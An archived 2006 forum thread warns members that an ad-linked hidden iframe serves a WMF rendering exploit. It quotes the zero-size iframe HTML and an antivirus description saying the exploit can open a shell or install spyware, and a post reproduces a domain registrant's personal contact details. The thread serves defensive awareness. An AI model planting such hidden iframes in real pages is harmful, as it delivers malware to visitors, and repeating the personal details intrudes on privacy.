Nov 22, 2009

Asta Worm ALERT: Exploit.Win32.WMF-PFV Trying To Infect

 		free web hosting
Open Discussion & Free Web Hosting > Computers & Tech > Security issues & Exploits

Asta Worm ALERT: Exploit.Win32.WMF-PFV Trying To Infect

miCRoSCoPiC^eaRthLinG
May 11 2006, 05:29 PM
WARNING: To all members

While browsing the forums, you might face a strange pop-up asking you to download a .wmv file. DO NOT download and/or try to play this. The pop-up looks somewhat like this (provided by Dha:
IPB Image

I believe this is being spread through one of the Ads displayed at Asta. Some guy has this worm embedded in his ads - that's the only logical explanation I can find.. Different anti-virus might identify it with different names - but essentially, it's a variant of the following worm. Most likely it's coming from an ad of taalkzforum.com. yes I confirmed it by visitng their page. If you visit taalkzforum you get flooded with this pop-up. If you inspect the forum page, you'll see an iframe containing the following code:
HTML
<iframe src="http://www.taalkzforum.com/ukpn/index.html" width=0 height=0></iframe>

When the forum page loads, it calls their URL to show in that iframe and naturally their site starts sending you this worm.

QUOTE(BitDefender.Com)

Exploit.Win32.WMF-PFV
Spreading: LOW Discovered : 2005 Dec 27
Damage: LOW
Size: 16 KB

SYMPTOMS:
Automatic worm or spyware installation, without confirmation.

TECHNICAL DESCRIPTION:
This is a WMF (Windows Meta-File) rendering exploit. The rendering bug that is exploited lies in the Windows Picture and Fax Viewer.

The WMF file could be placed on a web site that the victim visits and gets infected.

The exploit may create a shell on the victim computer, or may download and install a worm or a spyware trojan.

The exploits 'works' on Internet Explorer and some versions of Mozilla. However some browsers may display a confirmation dialog about it.

Source: http://www.bitdefender.com/VIRUS-173651-en...32.WMF-PFV.html


For a realtime report on how this worm is spreading and how many systems it has infected, check this:
Real-time Virus Reporting - Last 24 hours

Nothing to be really scared of - as long as you donot execute/try to play that file. If you click cancel you won't be infected and can carry on browsing the forums normally.

I'm trying to get in touch with OpaQue and get this ad blocked ASAP.

 

 

 


Comment/Reply (w/o sign-up)

miCRoSCoPiC^eaRthLinG
May 11 2006, 05:49 PM
Follow-up.. this is the domain registration info on Taalkzaforum
CODE


Registration Service Provided By: EZ Web Hosting
Contact: billingsys@ez-web-hosting.com
Visit: https://www.ez-web-hosting.com/domainrenewal.htm

Domain name: TAALKZFORUM.COM

Registrant Contact:
home
Carl Humphrey (carl_monster@yahoo.com)
+1.4028803915
Fax: +1.4028803915
2000 Broadway Ave, #404
San Francisco, CA 94115
US

Administrative Contact:
home
Carl Humphrey (carl_monster@yahoo.com)
+1.4028803915
Fax: +1.4028803915
2000 Broadway Ave, #404
San Francisco, CA 94115
US

Technical Contact:
Ez Web Hosting
Ez Web Hosting Support (support@ez-web-hosting.com)
1-877-ezwebhosting.c
Fax: none
4633 Welborn Dr.
Sherrills Ford, NC 28673
US

Status: Locked

Name Servers:
ns.ez-web-hosting.com
ns1.ez-web-hosting.com

Creation date: 06 Oct 2005 00:00:13
Expiration date: 06 Oct 2006 00:00:13


I'm contacting EZ-Webhosting.Com, with whom taalkzforum is hosted and trying to get them to intervene.

 

 

 


Comment/Reply (w/o sign-up)

sid.calcutta
May 11 2006, 06:25 PM
Thanks for your alert m^e, just now when i was logging in, the same dialog box appeared requesting for a download, though i did not download that for easily understandable reason.
Regards,
Sid

Comment/Reply (w/o sign-up)

dhanesh
May 11 2006, 06:43 PM
Yep its all fine now .. guess they took the mail you sent seriously smile.gif Thankx

Regards
Dhanesh.

Comment/Reply (w/o sign-up)

nightfox
May 12 2006, 01:42 AM
Hmm... they seem to have the domain now pointing to this one: http://www.ronmarshall.com/ronmarsh.html

Doesn't seem to have the virus anymore...

[N]F

Comment/Reply (w/o sign-up)

Got an Opinion! Express your Views! (no registration):-
Add your Reply/ Opinion/ Views/ Comments/ Suggestion/ Questions/ Queries etc.
Posts with decent grammar & English will be accepted and please refrain from profanities.
For asking a Question, We recommend you to sign-up (for free) so that you can track the topic easily.
Nature of your Post*: Opinion/ Reply/ Comments
Question/Query
Feedback to us.
       
Name   Email
Title/Question*

This textarea will convert to Rich-Text automatically (IE, Firefox, Chrome)

Similar Topics

Keywords : asta, worm, alert, exploit, win32, wmf, pfv, infect

  1. Storm Worm Adds Millions Of Computers To Botnet
    (0)
  2. New Virus? Uglyhuman Msn Virus
    A worm that isn't in the virus definitions yet? (29)
    Have you ever gotten a message from your friends that say something like this: its you on this
    photo http://uglyhuman.net/photo***.php I have received that from at least 3 people. Without
    knowing what it was (and the surprise from the domain name with the message /tongue.gif"
    style="vertical-align:middle" emoid=":P" border="0" alt="tongue.gif" />), I clicked on the link and
    Firefox prompted me to download a file. It was a COM file so I thought that was strange. I rechecked
    the URL it was a PHP web page, so I assumed it was telling me to download the photo, so I open....
  3. Yahoo Group Worm
    Worm infecting Yahoo Group users through attachment. (7)
    Those of you who use Yahoo Groups may or may not have already heard this, but about three days ago,
    I received an update from one of the groups I am a member of. Inside this notice I found two "New
    Graphic Site" messages and one "Virus Warning". The previous two came with attachments. Luckily, I
    read the virus warning first before opening them. In the virus warning was this piece of advice:
    QUOTE Just a quick warning to members about a virus that is sweeping Yahoo groups. It contains a
    number of attachments and the subject line reads "New Graphic Site". Don....
  4. Files Recovery Overwritten By Blackmail Worm
    Files recovery overwritten by Blackmail (1)
    I have an HDD 40 GB all of its MS Word, excel and PP files and Acrobat Reader files have been
    overwritten by the Blackmail Worm on 3rd Feb 2006.. Any suggestions for recovery the overwritten
    files....
  5. Worm Found In Zen Neeons?
    (4)
    I do not wish to copy the whole article so I'll post the link and summarize it here:
    http://www.pcmag.com/article2/0,1895,1854769,00.asp PC magazine has reported that Creative's
    Zen Neeon released from a company factory in late July contained a Windows Worm. The name is
    W32.Wullik.B Although this worm itself is not exactly harmful, it is proven that worms and viruses
    can now be transfered and hacked through company mainframes. This a serious problem because it could
    pose a threat to future developments. More hackers would try to modify the worm or create thei....
  6. Worm Alert - W32.zotob.a
    new worm to hit Windows PCs (8)
    A new worm has been detected by multiple antivirus and security specialists. It's called ZOTOB
    and is exploiting security holes that have been earlier highlighted in Microsoft Security Bulletin
    MS05-039 . The worm affects Win2000 systems and newer. Win 98, ME etc. are not currently thought to
    be at risk although, one must always keep the holes plugged. Details regarding what it does exactly
    and removal instructions can be found at Symantec's site and also at Microsoft's ZOTOB
    Advisory page The hole allowing Zotob to infect and spread can be fixed by i....
  7. Worm Nopir-b - Delete Mp3 Files
    watch out ! (0)
    The Worm Nopir-B spreads in nets of allotment of filing-cabinets (P2P) and erases MP3. according to
    British company, Sophos, the Nopir-B will have been created in France. The invader is offered as
    being a tool to copy DVD. When executed, it shows an image with messages against the piracy and
    tries to erase all the joined filing-cabinets mp3 in the computer. The desactiva Nopir also
    utilitarian of the operative system as the access to the Manager of Tasks, the Panel of Control and
    the Register.....
  8. Worm Sober It's Back
    (3)
    It comes by email watch out this little ******f*cker You may receive an email with this subject :
    "I've got your e-mail on my account" . Inside there are this file : Your_text.zip DONT OPEN
    This Virus affects all the Operative Systems Take care....
  9. How to recognize and remove Sasser Internet worm?
    (7)
    Name: Sasser Nick name: Sasser.A, Worm.Win32.Sasser.a Size: 15872 All version of this worm attack by
    "MS04-011 (LSASS)". MS04-011 (LSASS) cause overrun buffer in Local Security Authority Subsystem
    Service. Related: 1- this worm can run in Win 2000/Xp 2- There isn’t any security Patch. 3- This
    worm cause connect to Internet without any Firewall. 4- One of the characteristics of this worm is
    following file "C:\win.log", 5- This worm make a traffic on the TCP,9996,445 and 5554 Ports To
    remove this worm: 1- go to following address and download anti worm, http://www.f-sec....


      10. Looking for asta, worm, alert, exploit, win32, wmf, pfv, infect

See Also,

*SIMILAR VIDEOS*
Searching Video's for asta, worm, alert, exploit, win32, wmf, pfv, infect
advertisement



Asta Worm ALERT: Exploit.Win32.WMF-PFV Trying To Infect

Affordable Web Hosting, Low cost Web Hosting - ComputingHost.com